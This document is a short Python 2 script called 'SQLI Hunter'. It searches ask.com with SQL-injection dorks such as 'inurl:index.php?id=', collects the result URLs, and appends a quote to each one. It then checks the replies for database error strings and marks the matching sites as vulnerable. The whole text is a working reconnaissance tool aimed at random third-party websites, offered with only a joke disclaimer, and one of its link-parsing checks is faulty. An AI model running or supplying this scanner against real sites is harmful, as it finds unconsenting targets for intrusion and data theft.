SQLI Hunter

1. #######################################################################
2. ### Coded by Mr. Frost
3. ### Version: 0.1
4. #######################################################################
5.  
6.  
7. import urllib
8.  
9.  
10. def get_page(url):
11.         try:
12.             f = urllib.urlopen(url)
13.             page = f.read()
14.             f.close()
15.             return page
16.         except:
17.             return ""
18.         return ""
19.    
20. def get_link(page):
21.         start_link = page.find('class="url txt_lg" href=')
22.         start_link = start_link + 23
23.         if start_link == -1:
24.             return None
25.         start_quote = page.find('"', start_link)
26.         start_quote = start_quote
27.         end_quote = page.find('"', start_quote + 1)
28.         url = page[start_quote + 1:end_quote]
29.         return url, end_quote
30.  
31. def get_all_links(page):
32.         links = []
33.         for time in range(10):
34.             url,endpos = get_link(page)
35.             if url:
36.                 links.append(url)
37.                 page = page[endpos:]
38.             else:
39.                 break
40.         return links
41.  
42. def is_vul(url):
43.     check_url = url + "'"
44.     page = get_page(check_url)
45.     for i in range(len(sqli_errors)):
46.         if page.find(sqli_errors[i]) != -1:
47.             return True
48.     return False
49.  
50. dorks = ['inurl:index.php?id=', 'inurl:trainers.php?id=', 'inurl:article.php?ID=', 'inurl:gallery.php?id=', 'inurl:pageid=', 'inurl:games.php?id=', 'inurl:top10.php?cat=', 'inurl:reagir.php?num=', 'inurl:historialeer.php?num=', 'inurl:pages.php?id=', 'inurl:newsDetail.php?id=', 'inurl:staff_id=']
51.  
52. sqli_errors = ['Server Error in Application. Unclosed quotation mark before the character', 'Warning: mysql_fetch_array(): supplied argument is not a valid MySQL ', 'java.sql.SQLException: ORA-00933: SQL command not properly ended at ', 'Query failed: ERROR: unterminated quoted string at', 'You have an error in your SQL syntax', 'Cannot break/continue', 'argument is not a valid MySQL', 'mysql_fetch_array() ', 'mysql', 'MySQL']
53.  
54. print "SQLI Hunter mark i, all copyright going to Mr. Frost. Please dont use this shit for bad(Disclaimer)"
55.  
56. print "Please choose a dork to search from this list:"
57.  
58. for i in range(len(dorks)):
59.     print '[%d] %s' % (i + 1, dorks[i])
60.     print ""
61.  
62. dork = input("Please choose a dork: ")
63. dork = dork - 1
64. while(dork > len(dorks) - 1):
65.     print ""
66.     print "Error: dork doesnt exist"
67.     dork = input("Please choose a dork: ")
68.     dork = dork - 1
69. print ""
70. print '[+] Starting searching for sites...'
71.  
72. dork_page = get_page("http://www.ask.com/web?q=" + dorks[dork])
73.  
74.  
75. print ""
76. maybe_vul_sites = get_all_links(dork_page)
77. for i in range(len(maybe_vul_sites)):
78.     print '[%d]  %s'%(i + 1, maybe_vul_sites[i])
79.     print ""
80.  
81.  
82. print "[+] Scan complete..."
83.  
84. print ""
85.  
86. print "[+] Starting testing..."
87.  
88. print ""
89.  
90. for time in range(len(maybe_vul_sites)):
91.     if is_vul(maybe_vul_sites[time]):
92.         print "[+] %s - is vulnerable" %(maybe_vul_sites[time])
93.         print ""
94.     else:
95.         print "[-] %s - FAILED" % (maybe_vul_sites[time])
96.         print ""
97.  
98. print "[+] Testing done!"